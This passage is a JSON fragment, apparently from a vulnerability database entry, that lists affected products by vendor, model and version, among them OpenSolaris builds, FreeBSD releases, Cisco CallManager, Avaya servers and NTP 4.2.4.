            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2010.0"
          },
          {
            "_id": null,
            "model": "rtos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "qnx",
            "version": "6.2.1"
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 77",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 61",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "7.1-release-p4",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2009.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 82",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "7.0-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 29",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "meeting exchange sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "linux armel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 41",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.5"
          },
          {
            "_id": null,
            "model": "ace xml gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "unified callmanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 126",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "7.2-release-p4",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "esxi server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.5"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "7.1-release-p5",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "7.0-release-p8",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "voice portal sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 35",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.6"
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.0(2)"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "unified callmanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0(4)"
          },
          {
            "_id": null,
            "model": "ctpos 6.6r2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "intuity audix lx sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop version",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "95000"
          },
          {
            "_id": null,
            "model": "unified callmanager 3.3 sr3",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms i64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "unified callmanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 130",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "7.1-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 105",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager 6.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "-pre-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.19"
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "unified callmanager 4.1 sr4",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1(2)"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 88",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "_id": null,
            "model": "8.0-release",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager 7.1 su1",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "sparc t3-1b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "unified callmanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "unified callmanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "unified callmanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0(3)"
          },
          {
            "_id": null,
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "16.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 111",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 118",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 59",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "7.2-prerelease",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.18"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 112",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "sparc t3-2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "7.2-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "meeting exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "solaris 8 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(3)"
          },
          {
            "_id": null,
            "model": "p8",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ntp",
            "version": "4.2.4"
          },
          {
            "_id": null,
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 96",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "rtos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "qnx",
            "version": "6.4"
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.7"
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.10"
          },
          {
            "_id": null,
            "model": "-release-p9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "appliance platform linux service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "_id": null,
            "model": "netra sparc t3-1b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1(4)"
          },
          {
            "_id": null,
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "-release-p3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.4"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 132",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "rtos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "qnx",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 36",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 48",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2.1"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "_id": null,
            "model": "-release-p1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms i64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.3"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 94",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager 4.3 sr1b",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "unified callmanager 4.1 sr7",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "-release-p6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 50",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "rtos update patch a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "qnx",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "unified callmanager 4.2 sr4b",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "8.0-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "7.1-release-p6",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "-release-p9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "wide area application services 4.1.1b",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager sr4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "enterprise server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "5"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "aura communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.6"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.4"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2009.1"
          },
          {
            "_id": null,
            "model": "p4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ntp",
            "version": "4.2.4"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.04"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3.9"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 01",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 92",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux x86 64 -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "2"
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "rtos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "qnx",
            "version": "4.25"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.0.2"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 83",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "meeting exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 106",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "6.4-release-p2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 125",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "7.0-release-p3",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.4"
          },
          {
            "_id": null,
            "model": "telepresence readiness assessment manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "5"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.9"
          },
          {
            "_id": null,
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3.1"
          },
          {
            "_id": null,
            "model": "idp 5.1r4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pardus",
            "version": "20080"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "meeting exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "6.4-release-p4",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 76",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.1(2)"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "7.0-release",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 101a",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 111a",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 87",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2010.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 113",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2009.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 57",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "unified communication manager business edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.0.4"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0.x"
          },
          {
            "_id": null,
            "model": "meetingplace",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "appliance platform linux service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "2"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 119",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.13"
          },
          {
            "_id": null,
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 110",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.10"
          },
          {
            "_id": null,
            "model": "unified communications manager 4.2 sr2",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 71",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "linux lts lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.10"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3.8"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.04"
          },
          {
            "_id": null,
            "model": "sparc t3-4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rtos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "qnx",
            "version": "6.4.1"
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.3(2)"
          },
          {
            "_id": null,
            "model": "unified communications manager 4.3 sr1",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "telepresence recording server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "unified callmanager 5.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "unified callmanager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "unified callmanager 5.0 su1",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "unified callmanager 4.1 sr8",
            "scope": null,
            "trust": 0.3,
